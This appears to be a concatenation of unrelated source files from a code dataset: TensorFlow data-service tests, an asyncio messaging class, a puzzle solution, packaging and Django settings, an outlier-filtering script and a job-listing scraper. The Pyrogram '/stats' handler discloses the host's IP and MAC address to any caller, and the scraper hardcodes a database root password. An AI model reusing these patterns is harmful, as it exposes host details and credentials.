from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", cluster.dispatcher.target, dataset_id, wrong_spec
)
with self.assertRaises(Exception):
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdNotRegistered(self):
cluster = self.make_test_cluster(num_workers=1)
dataset_id = "UnregisteredID"
element_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
with self.assertRaisesRegex(
errors.NotFoundError, f"Dataset id {dataset_id} not found."
):
from_dataset_id_ds = data_service_ops.from_dataset_id(
data_service_ops.ShardingPolicy.OFF,
cluster.dispatcher.target,
dataset_id,
element_spec,
)
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.default_test_combinations())
def testCancellation(self):
self.skipTest("b/162521601")
sleep_microseconds = int(1e6) * 1000
cluster = self.make_test_cluster(num_workers=1)
# Create a dataset which produces the first element quickly, and the second
# element slowly. Fetching the first element triggers prefetching of the
# second element, which we should be able to cancel.
slow = dataset_ops.Dataset.range(1)
slow = slow.apply(testing.sleep(sleep_microseconds))
ds = dataset_ops.Dataset.range(1).concatenate(slow)
ds = self.make_distributed_dataset(ds, cluster)
ds = ds.prefetch(1)
get_next = self.getNext(ds)
self.assertEqual(0, self.evaluate(get_next()))
# Without properly implemented cancellation, we will hang here while trying
# to garbage collect the dataset iterator.
@combinations.generate(test_base.default_test_combinations())
def testRegisterDifferentDatasets(self):
ds_1 = dataset_ops.Dataset.range(10)
ds_2 = dataset_ops.Dataset.range(20)
cluster = self.make_test_cluster(num_workers=1)
id_1 = data_service_ops.register_dataset(cluster.dispatcher_address(), ds_1)
id_2 = data_service_ops.register_dataset(cluster.dispatcher_address(), ds_2)
self.assertNotEqual(self.evaluate(id_1), self.evaluate(id_2))
@combinations.generate(test_base.default_test_combinations())
def testRegisterWithExplicitDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset, dataset_id="dataset_id"
)
dataset = data_service_ops.from_dataset_id(
dataset_id=dataset_id,
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.assertDatasetProduces(dataset, list(range(10)))
# Verifies the dataset ID is indeed "dataset_id".
dataset = data_service_ops.from_dataset_id(
dataset_id="dataset_id",
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.assertDatasetProduces(dataset, list(range(10)))
# Eager mode only: In the graph mode, `register_dataset` may not run before
# `from_dataset_id` if `from_dataset_id` does not use its return value.
@combinations.generate(test_base.eager_only_combinations())
def testFromRegisteredStringDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
_ = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset, dataset_id="dataset_id"
)
dataset = data_service_ops.from_dataset_id(
dataset_id="dataset_id",
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testRegisterSameDatasetIds(self):
cluster = self.make_test_cluster(num_workers=1)
dataset1 = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.range(10)
dataset_id1 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset1, dataset_id="dataset_id"
)
dataset_id2 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset2, dataset_id="dataset_id"
)
dataset1 = data_service_ops.from_dataset_id(
dataset_id=dataset_id1,
element_spec=dataset1.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
dataset2 = data_service_ops.from_dataset_id(
dataset_id=dataset_id2,
element_spec=dataset2.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
# `dataset2` is empty because the datasets share the same job and `dataset1`
# has exhausted the dataset.
self.assertDatasetProduces(dataset1, list(range(10)))
self.assertDatasetProduces(dataset2, list())
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
different_dataset_id=[None, "another_dataset_id"]
),
)
)
def testRegisterDifferentDatasetIds(self, different_dataset_id):
cluster = self.make_test_cluster(num_workers=1)
dataset1 = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.range(10)
dataset_id1 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset1, dataset_id="dataset_id"
)
dataset_id2 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset2, dataset_id=different_dataset_id
)
dataset1 = data_service_ops.from_dataset_id(
dataset_id=dataset_id1,
element_spec=dataset1.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
dataset2 = data_service_ops.from_dataset_id(
dataset_id=dataset_id2,
element_spec=dataset2.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
# `dataset1` and `dataset2` are different datasets.
self.assertDatasetProduces(dataset1, list(range(10)))
self.assertDatasetProduces(dataset2, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testDatasetsDoNotMatch(self):
cluster = self.make_test_cluster(num_workers=1)
dataset1 = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.from_tensor_slices(list("Test dataset."))
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Datasets with the same ID should have the same structure",
):
dataset_id1 = data_service_ops.register_dataset(
cluster.dispatcher.target,
dataset1,
compression=None,
dataset_id="dataset_id",
)
dataset_id2 = data_service_ops.register_dataset(
cluster.dispatcher.target,
dataset2,
compression=None,
dataset_id="dataset_id",
)
dataset1 = data_service_ops.from_dataset_id(
dataset_id=dataset_id1,
element_spec=dataset1.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
dataset2 = data_service_ops.from_dataset_id(
dataset_id=dataset_id2,
element_spec=dataset2.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.getDatasetOutput(dataset1)
self.getDatasetOutput(dataset2)
@combinations.generate(test_base.default_test_combinations())
def testDoubleDistribute(self):
cluster = self.make_test_cluster(num_workers=1)
ds = self.make_distributed_range_dataset(num_elements=10, cluster=cluster)
ds = self.make_distributed_dataset(dataset=ds, cluster=cluster)
self.assertDatasetProduces(ds, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testTwoLevelDistribute(self):
cluster_1_size = 3
cluster_1 = self.make_test_cluster(num_workers=cluster_1_size)
cluster_2 = self.make_test_cluster(num_workers=1)
num_sizes = 10
size_repeats = 5
strings = ["a" * i for i in range(num_sizes)] * size_repeats
ds = dataset_ops.Dataset.from_tensor_slices(strings)
ds = ds.shuffle(len(strings))
ds = self.make_distributed_dataset(ds, cluster_1)
# Large enough so that all strings of the same size are windowed together.
window_size = cluster_1_size * size_repeats
batch_size = size_repeats
def key_func(x):
return math_ops.cast(string_ops.string_length_v2(x), dtypes.int64)
ds = ds.apply(
grouping.group_by_window(
key_func=key_func,
reduce_func=lambda _, x: x.batch(batch_size),
window_size=window_size,
)
)
ds = self.make_distributed_dataset(ds, cluster_2)
get_next = self.getNext(ds)
for _ in range(num_sizes):
element = self.evaluate(get_next())
for _ in range(1, cluster_1_size):
self.assertAllEqual(self.evaluate(get_next()), element)
self.assertEmpty(self.getIteratorOutput(get_next))
@combinations.generate(
combinations.times(test_base.default_test_combinations())
)
def testDistributeLargeGraph(self):
cluster = self.make_test_cluster(
num_workers=1, work_dir=NO_WORK_DIR, fault_tolerant_mode=False
)
# Larger than default OSS grpc message size limit of 4MB.
tensor = array_ops.ones((2, 1000, 1000), dtype=dtypes.float32)
ds = dataset_ops.Dataset.from_tensors(tensor)
ds = self.make_distributed_dataset(ds, cluster)
self.assertDatasetProduces(ds, [tensor])
@combinations.generate(
combinations.times(test_base.default_test_combinations())
)
def testBatchDropsAllElements(self):
cluster = self.make_test_cluster(
num_workers=2, fault_tolerant_mode=False
)
dataset = dataset_ops.Dataset.range(10).batch(1000, drop_remainder=True)
dataset = self.make_distributed_dataset(
dataset, cluster, processing_mode=data_service_ops.ShardingPolicy.OFF
)
self.assertDatasetProduces(dataset, [])
@combinations.generate(
combinations.times(test_base.default_test_combinations())
)
def testBatchDoesNotDropRemainder(self):
num_workers = 2
cluster = self.make_test_cluster(
num_workers=num_workers, fault_tolerant_mode=False
)
dataset = dataset_ops.Dataset.range(10).batch(1000, drop_remainder=False)
dataset = self.make_distributed_dataset(
dataset, cluster, processing_mode=data_service_ops.ShardingPolicy.OFF
)
self.assertDatasetProduces(dataset, [list(range(10))] * num_workers)
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(use_resource=False),
)
+ combinations.times(
test_base.default_test_combinations(),
combinations.combine(use_resource=True),
)
)
def testVariables(self, use_resource):
cluster = self.make_test_cluster(num_workers=1)
if not use_resource:
with variable_scope.variable_scope("foo", use_resource=False):
v = variable_v1.VariableV1(10, dtype=dtypes.int64)
else:
v = variables.Variable(10, dtype=dtypes.int64)
ds = dataset_ops.Dataset.range(3)
ds = ds.map(lambda x: x + v)
ds = self.make_distributed_dataset(ds, cluster)
self.evaluate(v.initializer)
self.assertDatasetProduces(
ds, list(range(10, 13)), requires_initialization=True
)
@combinations.generate(test_base.default_test_combinations())
def testNoShardingPolicy(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(20)
dataset = self.make_distributed_dataset(
dataset,
cluster=cluster,
processing_mode=data_service_ops.ShardingPolicy.OFF,
)
self.assertDatasetProduces(dataset, list(range(20)))
class DataServiceOpsGrpcDataTransferTest(
data_service_test_base.TestBase, parameterized.TestCase
):
@combinations.generate(test_base.default_test_combinations())
def testExplicitProtocolFromDatasetId(self):
cluster = self.make_test_cluster(
num_workers=1, data_transfer_protocol="grpc"
)
range_ds = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, range_ds
)
ds = data_service_ops.from_dataset_id(
dataset_id=dataset_id,
processing_mode="parallel_epochs",
element_spec=range_ds.element_spec,
service=cluster.dispatcher.target,
data_transfer_protocol="grpc",
)
self.assertDatasetProduces(ds, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testDistributeExplicitProtocol(self):
cluster = self.make_test_cluster(
num_workers=1, data_transfer_protocol="grpc"
)
ds = dataset_ops.Dataset.range(10)
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service="grpc://" + cluster.dispatcher_address(),
)
)
self.assertDatasetProduces(ds, list(range(10)))
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(compression=[None, "AUTO"]),
)
)
def testDistributeCompression(self, compression):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = self.make_distributed_range_dataset(
num_elements, cluster, compression=compression
)
self.assertDatasetProduces(ds, list(range(num_elements)))
if __name__ == "__main__":
test.main()
|
999,304 | dbd9da9d9cb494eb6f1ae92758b8c2a5eca928d6 | import random
import logging
import sys
import msgpack
import struct
from asyncio import get_event_loop, start_server, Task, coroutine, \
open_connection, IncompleteReadError, sleep
log = logging.getLogger('clicky.messageio')
class Connection:
def __init__(self, name, reader, writer):
self.live = True
self.name = name
self.reader = reader
self.writer = writer
class MessageIO:
def __init__(self, client_mode=False):
self.connections = []
self.client_mode = client_mode
def run(self, host='127.0.0.1', port=11000):
coro = start_server(self.client_connected, host=host, port=port)
loop = get_event_loop()
loop.run_until_complete(coro)
@coroutine
def connect(self, host, port):
log.info('connecting to {0}:{1}'.format(host, port))
reader, writer = yield from open_connection(host, port)
log.info('connected.')
yield from self.new_connection(reader, writer)
def client_connected(self, client_reader, client_writer):
Task(self.new_connection(client_reader, client_writer))
@coroutine
def new_connection(self, reader, writer):
name = writer.get_extra_info('peername', None)
log.info('new connection {}'.format(name))
# FIXME
assert name is not None
c = Connection(name, reader, writer)
self.connections.append(c)
Task(self.listen(c))
@coroutine
def listen(self, connection):
while connection.live:
log.info('listening to {} for msg'.format(connection.name))
try:
msg = yield from self.receive(connection.reader)
Task(self.handle_message(connection, msg))
except IncompleteReadError as e:
log.info('Incomplete Read. {} set to dead'.format(
connection.name))
connection.live = False
log.info('removing {} from connections')
# FIXME: O(n)! make connections a set
self.connections.remove(connection)
@coroutine
def send(self, obj, connection=None, *, packed=False):
if self.client_mode:
yield from self.maybe_wait_for_connect()
if not connection and self.client_mode:
connection = self.connections[0]
elif not connection and not self.client_mode:
raise Exception('must specify connection in server mode!')
if packed:
m = obj
else:
m = msgpack.packb(obj, use_bin_type=True)
L = len(m)
log.debug('sending message length({0}) to {1}'.format(L, connection.name))
try:
connection.writer.write(struct.pack('>I',L))
connection.writer.write(m)
yield from connection.writer.drain()
except ConnectionResetError as e:
log.info('Connection Reset. {} set to dead'.format(
connection.name))
connection.live = False
@coroutine
def maybe_wait_for_connect(self):
while self.client_mode and len(self.connections) == 0:
log.debug('waiting...')
yield from sleep(0.25)
@coroutine
def receive(self, reader):
# read 4 bytes and interpret them as a big endian integer for
# length of the message to follow
data = yield from reader.readexactly(4)
log.debug('received {}'.format(data))
length = struct.unpack('>I', data)[0]
log.debug('incoming message of length {}'.format(length))
# now read a message of this length and unpack it using msgpack
data = yield from reader.readexactly(length)
msg = msgpack.unpackb(data, encoding='utf-8')
log.debug('got message of length {}'.format(length))
return msg
@coroutine
def handle_message(self, connection, msg):
log.info('received message from {}'.format(connection.name))
|
999,305 | d09fb1ff8b4a75bef31550b8b5fafffdc039e13e | #일곱 난쟁이
nlist=[]
for nan in range(9):
nlist.append(int(input()))
def find(nlist):
total=sum(nlist)
for i in range(9):
for j in range(i+1,9):
if nlist[i]+nlist[j]==total-100:
return nlist[i],nlist[j]
n1,n2=find(nlist)
nlist.remove(n1)
nlist.remove(n2)
nlist.sort()
for i in nlist:
print(i)
|
999,306 | 4774d42f697b676158dfd6c22d8348d8b758a145 | """
Install portal via setuptools
"""
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as testcommand
with open('test_requirements.txt') as test_reqs:
TESTS_REQUIRE = test_reqs.readlines()
with open('README.rst') as readme_file:
README = readme_file.read()
class PyTest(testcommand):
"""PyTest class to enable running `python setup.py test`"""
user_options = testcommand.user_options[:]
user_options += [
('coverage', 'C', 'Produce a coverage report for portal'),
('pep8', 'P', 'Produce a pep8 report for portal'),
('pylint', 'l', 'Produce a pylint report for portal'),
]
coverage = None
pep8 = None
lint = None
test_suite = False
test_args = []
def initialize_options(self):
pass
def finalize_options(self):
self.test_suite = True
self.test_args = []
if self.coverage:
self.test_args.extend(['--cov', 'portal'])
if self.pep8:
self.test_args.append('--pep8')
if self.lint:
self.test_args.append('--lint')
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import pytest
# Needed in order for pytest_cache to load properly
# Alternate fix: import pytest_cache and pass to pytest.main
import _pytest.config
plugin_manager = _pytest.config.get_plugin_manager()
plugin_manager.consider_setuptools_entrypoints()
sys.exit(pytest.main(self.test_args))
setup(
name='portal',
version='0.3.0',
license='AGPLv3',
author='MIT ODL Engineering',
author_email='odl-engineering@mit.edu',
url='http://github.com/mitodl/portal',
description="Teacher's Portal",
long_description=README,
packages=find_packages(),
install_requires=[
'Django',
'PyYAML',
'dj-database-url',
'dj-static',
'uwsgi',
'psycopg2',
'tox',
],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Programming Language :: Python',
],
test_suite="portal.tests",
tests_require=TESTS_REQUIRE,
cmdclass={"test": PyTest},
include_package_data=True,
zip_safe=False,
)
|
999,307 | 31ccb0c67c0f39c82970c902d8c53c7110e5803d | import platform
import re
import socket
import sys
import time
import uuid
from datetime import datetime
from os import environ, execle, path, remove
from player.helpers.decorators import humanbytes
import psutil
from pyrogram import Client, filters, __version__
# FETCH SYSINFO
@Client.on_message(filters.command('stats'))
async def give_sysinfo(client, message):
splatform = platform.system()
platform_release = platform.release()
platform_version = platform.version()
architecture = platform.machine()
hostname = socket.gethostname()
ip_address = socket.gethostbyname(socket.gethostname())
mac_address = ":".join(re.findall("..", "%012x" % uuid.getnode()))
processor = platform.processor()
ram = humanbytes(round(psutil.virtual_memory().total))
cpu_freq = psutil.cpu_freq().current
if cpu_freq >= 1000:
cpu_freq = f"{round(cpu_freq / 1000, 2)}GHz"
else:
cpu_freq = f"{round(cpu_freq, 2)}MHz"
du = psutil.disk_usage(client.workdir)
psutil.disk_io_counters()
disk = f"{humanbytes(du.used)} / {humanbytes(du.total)} " f"({du.percent}%)"
cpu_len = len(psutil.Process().cpu_affinity())
somsg = f"""**System Info**
**PlatForm :** `{splatform}`
**PlatForm - Release :** `{platform_release}`
**PlatFork - Version :** `{platform_version}`
**Architecture :** `{architecture}`
**Hostname :** `{hostname}`
**IP :** `{ip_address}`
**Mac :** `{mac_address}`
**Processor :** `{processor}`
**Ram : ** `{ram}`
**CPU :** `{cpu_len}`
**CPU FREQ :** `{cpu_freq}`
**DISK :** `{disk}`
"""
await message.reply(somsg)
|
999,308 | 47fec2e496b52eee562b49414b1c14169ec49ec9 | import numpy as np
from scipy.stats import rankdata
import argparse
import loc_utils as lut
from standards import *
# Column index
r = RAWix()
def report_analysis(analysis, outliers):
n = len(outliers)
if n > 0:
print('{} detected {} outlier(s):'.format(analysis, n))
print(outliers)
else:
print('No outliers detected by {}'.format(analysis))
def measure_choice_bias(data, collapse_tasks=True):
sids = lut.get_unique(data, r.ix('sid'))
tasks = lut.get_unique(data, r.ix('cat'))
num_tasks = tasks.size
num_sids = sids.size
pmax = np.zeros([num_sids, num_tasks])
for i, sid in enumerate(sids):
for j, tsk in enumerate(tasks):
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('cat'): tsk})
choices, counts = np.unique(data[mask, r.ix('food')], return_counts=True)
pmax[i, j] = np.max(counts) / np.sum(counts)
return np.mean(pmax, axis=1) if collapse_tasks else pmax
def measure_allocation_variance(data):
sids = lut.get_unique(data, r.ix('sid'))
num_sids = sids.size
free_stage = 1
stds = np.zeros(num_sids)
for i, sid in enumerate(sids):
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('stage'): free_stage})
choices, counts = np.unique(data[mask, r.ix('cat')], return_counts=True)
stds[i] = np.std(
np.pad(counts, pad_width=(0, 4-np.size(counts)), mode='constant')
)
return stds
def detect_extreme_sticking(data):
outliers = []
sids = lut.get_unique(data, r.ix('sid'))
for sid in sids:
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('stage'): 1})
tasks_played = data[mask, r.ix('cat')]
if np.all(tasks_played == tasks_played[0]):
outliers.append(sid)
report_analysis('Extreme sticking analysis', outliers)
return outliers
def detect_choice_bias(data, criterion='sd', critval=2, return_cutoff=False):
mean_choice_bias = measure_choice_bias(data)
if criterion.lower() == 'val':
outliers = np.where(mean_choice_bias > critval)[0].tolist()
else:
average_mean_choice_bias = np.mean(mean_choice_bias)
sd_mean_choice_bias = np.std(mean_choice_bias)
critval = average_mean_choice_bias + sd_mean_choice_bias * critval
outliers = np.where(np.abs(mean_choice_bias) > critval)[0].tolist()
report_analysis('Choice bias analysis', outliers)
if return_cutoff:
return outliers, critval
return outliers
def detect_by_allocation_variance(data, crit):
outliers = []
sids = lut.get_unique(data, r.ix('sid'))
num_sids = sids.size
free_stage = 1
stds = np.zeros(num_sids)
for i, sid in enumerate(sids):
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('stage'): free_stage})
choices, counts = np.unique(data[mask, r.ix('cat')], return_counts=True)
stds[i] = np.std(
np.pad(counts, pad_width=(0, 4-counts.size), mode='constant')
)
if stds[i] > crit:
outliers.append(sid)
report_analysis('Allocation variance', outliers)
return outliers
def remove_by_sid(data, sids, assign_new_ids=False):
outliers_mask = np.isin(data[:, r.ix('sid')], sids)
filtered_data = data[np.logical_not(outliers_mask), :]
if assign_new_ids:
filtered_data[:, r.ix('sid')] = rankdata(filtered_data[:, r.ix('sid')], 'dense') - 1
return filtered_data
def filter_outliers(path_to_data, save_to=None, extreme_sticking=True,
choice_bias_criterion='sd', choice_bias_critval=2,
alloc_var_crit=None,
assign_new_ids=True,
report_counts=True):
data = lut.unpickle(path_to_data)
lut.report_subject_counts(data['main'])
stickers1, stickers2, choice_biased = [], [], []
if extreme_sticking:
stickers1 = detect_extreme_sticking(data['main'])
if choice_bias_criterion:
choice_biased = detect_choice_bias(data['main'], criterion=choice_bias_criterion, critval=choice_bias_critval)
if alloc_var_crit:
stickers2 = detect_by_allocation_variance(data['main'], alloc_var_crit)
all_outliers = np.unique(stickers1 + stickers2 + choice_biased)
print('Removing {} outliers'.format(all_outliers.size))
data['main'] = remove_by_sid(data['main'], all_outliers, assign_new_ids=assign_new_ids)
data['extra'] = remove_by_sid(data['extra'], all_outliers, assign_new_ids=assign_new_ids)
lut.report_subject_counts(data['main'])
if save_to:
lut.dopickle(save_to, data)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('path')
parser.add_argument('-s', '--save_to', help='pickles and saves data with outliers removed', default=None)
parser.add_argument('-x', '--extreme_sticking', help='whether to remove extreme stickers', default=True)
parser.add_argument('-c', '--side_bias_crit', help='pickles and saves data with outliers removed', default='sd')
parser.add_argument('-v', '--side_bias_critval', help='pickles and saves data with outliers removed', default=2,
type=int)
ARGS = parser.parse_args()
filter_outliers(path_to_data=ARGS.path,
save_to=ARGS.save_to,
extreme_sticking=ARGS.extreme_sticking,
choice_bias_criterion=ARGS.side_bias_crit,
choice_bias_critval=ARGS.side_bias_critval)
# # detect_extreme_sticking by groups
# for grp in [0,1]:
# for cnd in [0,1]:
# mask = lut.get_mask(main_data, {r.ix('group'):grp, r.ix('cond'): cnd})
# detect_extreme_sticking(main_data[mask, :]) |
999,309 | 306e9ba396d8a547aaa2deb9ac291960113c9e3f | __author__ = 'Jun Wang'
# -*- coding:utf-8 -*-
import json,urllib2,sys, MySQLdb
# import pandas as pd
reload(sys)
sys.setdefaultencoding('utf8')
# from pandas import DataFrame,Series
db = MySQLdb.connect(host="localhost",user="root", passwd="wanjun", db="test", use_unicode=True, charset="utf8")
cursor = db.cursor()
cursor.execute("DROP TABLE IF EXISTS lagou_it")
db.commit()
cursor.execute('''CREATE TABLE IF NOT EXISTS lagou_it(
position_name VARCHAR(100),
company_name VARCHAR(100),
company_size VARCHAR(100),
city VARCHAR(20),
industry VARCHAR(200),
salary VARCHAR(50),
jobnature VARCHAR(20),
education VARCHAR(50),
workyear VARCHAR(50)
)''')
def lagou_spider_keyword():
i = 0
# type = 'true'
url = 'http://www.lagou.com/jobs/positionAjax.json?pn='+str(i+1)
data = urllib2.urlopen(url).read()
data_json = json.loads(data)
# totalCount = int(data_json['content']['positionResult']['totalCount'])
totalCount = 5000
resultSize = int(data_json['content']['positionResult']['resultSize'])
totalPage = totalCount/resultSize+1
result = []
for i in range(totalPage):
# time.sleep(1)
print 'fetching Page '+str(i)
url = 'http://www.lagou.com/jobs/positionAjax.json?pn='+str(i+1)
data = urllib2.urlopen(url).read()
data_json = json.loads(data)
resultSize = int(data_json['content']['positionResult']['resultSize'])
if resultSize>0:
for j in range(resultSize):
search_result = data_json['content']['positionResult']['result']
result_dic = dict(search_result[j])
companyFullName = result_dic['companyFullName']
positionName = result_dic['positionName']
education = result_dic['education']
city = result_dic['city']
industryField = result_dic['industryField']
jobNature = result_dic['jobNature']
workYear = result_dic['workYear']
salary = result_dic['salary']
companySize = result_dic['companySize']
result_pos = [positionName,companyFullName,companySize,city,industryField,salary,jobNature,education,workYear]
result.append(result_pos)
sql = """INSERT INTO lagou_it\
SET position_name=%s,company_name=%s,company_size=%s,city=%s,industry=%s,salary=%s,jobnature=%s,education=%s,workyear=%s"""
for x in range(0, len(result)):
cursor.execute(sql,(result[x][0],result[x][1],result[x][2],result[x][3],result[x][4],result[x][5],result[x][6],result[x][7],result[x][8],))
db.commit()
if __name__=='__main__':
# keyword='数据分析' #define search keyword
lagou_spider_keyword()
|
999,310 | 86e8691bf6f81e7cbccbf8acbf7e830c3ce11793 | num = int(input('Enter a number: '))
cpy_num = num
counter = 0
while cpy_num != 0:
counter += 1
cpy_num = cpy_num//10
print('The number', num, 'contains', counter, 'digits') if counter > 1 \
else print('The number', num, 'contains', counter, 'digit')
|
999,311 | 64bb870c2941b518a17d1156ab52b4c543bf6b91 | ''' Read input from STDIN. Print your output to STDOUT '''
#Use input() to read input from STDIN and use print to write your output to STDOUT
'''
Count In Range And Specific (100 Marks)
You will be given an array and a range and you need to count how many array
elements lies in that range and not divisible by 3 and 5.
Input Format
First line will contain an Integer indicating size of the array.
Next line will contain n integer denoting the array elements.
Constraints
1 <= L <= 1000
1 <= Ai <= 1000
Output Format
Print the count to the STDOUT.
Sample TestCase 1
Input
6
16 17 4 3 5 2
2 10
output
2
'''
import sys
def main():
# Write code here
n = int(input().strip())
alist = [int(x) for x in input().strip().split()]
start,stop = [int(x) for x in input().strip().split()]
alist =list(filter(lambda x: x>=start and x<=stop,alist))
sys.stdout.write(str(len(list(filter(lambda x: x%3!=0 and x%5!=0,alist)))))
main()
|
999,312 | b2d085f928bdd385fce67551e491ece66ac618c4 |
def reverse(array, k):
section = array[0:k][::-1]
return section + array[k:]
a = [5, 6, 7, 2, 4, 3, 8, 10]
k = 3
print(reverse(a, k))
|
999,313 | 982222fc025e5b265bdcc832a048e70d508ed0e0 | echo "hello"
|
999,314 | 44f45d86eb9dba8f6579cfa504aa5faa29991fd3 | """courses URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, re_path
from courses import views
app_name = 'courses'
# urlpatterns contém a lista de roteamentos de URLs
urlpatterns = [
#GET /
path('', views.index, name='index'),
#re_path(r'(?P<pk>\d+)/$', views.details, name='details'),
re_path(r'(?P<slug>[\w_-]+)/$', views.details, name='details'),
re_path(r'(?P<slug>[\w_-]+)/inscricao$', views.enrollment, name='enrollment'),
re_path(r'(?P<slug>[\w_-]+)/cancelar-inscricao$', views.undo_enrollment,
name='undo_enrollment'),
re_path(r'(?P<slug>[\w_-]+)/anuncios$', views.announcements,
name='announcements'),
re_path(r'(?P<slug>[\w_-]+)/anuncios/(?P<pk>\d+)$', views.show_announcement,
name='show_announcement'),
] |
999,315 | 37964b63f90ba2617445e667b988796ae46fc5be | from rest_framework.serializers import ModelSerializer
from .models import User
class UserProfileSerializer(ModelSerializer):
class Meta:
model = User
fields = [
"username",
'address',
'mobile_number',
'first_name',
'last_name'
]
|
999,316 | 64eda1b08f263efe5cf81982b729f9a302e3cab5 |
"""
Base Django settings for puzzlehunt_server project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import dirname, abspath
import codecs
codecs.register(lambda name: codecs.lookup('utf8') if name == 'utf8mb4' else None)
BASE_DIR = dirname(dirname(dirname(abspath(__file__))))
# Application definition
SITE_TITLE = "Puzzlehunt CMU"
INSTALLED_APPS = (
'bootstrap_admin',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'django.contrib.sites',
'django.contrib.flatpages',
'huntserver',
'crispy_forms',
'huey.contrib.djhuey',
)
SITE_ID = 1 # For flatpages
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'puzzlehunt_server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': [os.path.join(BASE_DIR, 'puzzlehunt_server/templates')],
'OPTIONS': {
'builtins': ['huntserver.templatetags.hunt_tags',
'huntserver.templatetags.prepuzzle_tags'],
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://redis:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient"
},
"KEY_PREFIX": "puzzlehunt"
}
}
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
HUEY = {
'connection': {
'host': 'redis',
},
'consumer': {
'workers': 2,
},
}
WSGI_APPLICATION = 'puzzlehunt_server.wsgi.application'
# URL settings
LOGIN_REDIRECT_URL = '/'
PROTECTED_URL = '/protected/'
LOGIN_URL = 'huntserver:login_selection'
# Random settings
SILENCED_SYSTEM_CHECKS = ["urls.W005"] # silences admin url override warning
CRISPY_TEMPLATE_PACK = 'bootstrap3'
DEBUG_TOOLBAR_PATCH_SETTINGS = False
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
DEFAULT_HINT_LOCKOUT = 60 # 60 Minutes
HUNT_REGISTRATION_LOCKOUT = 2 # 2 Days
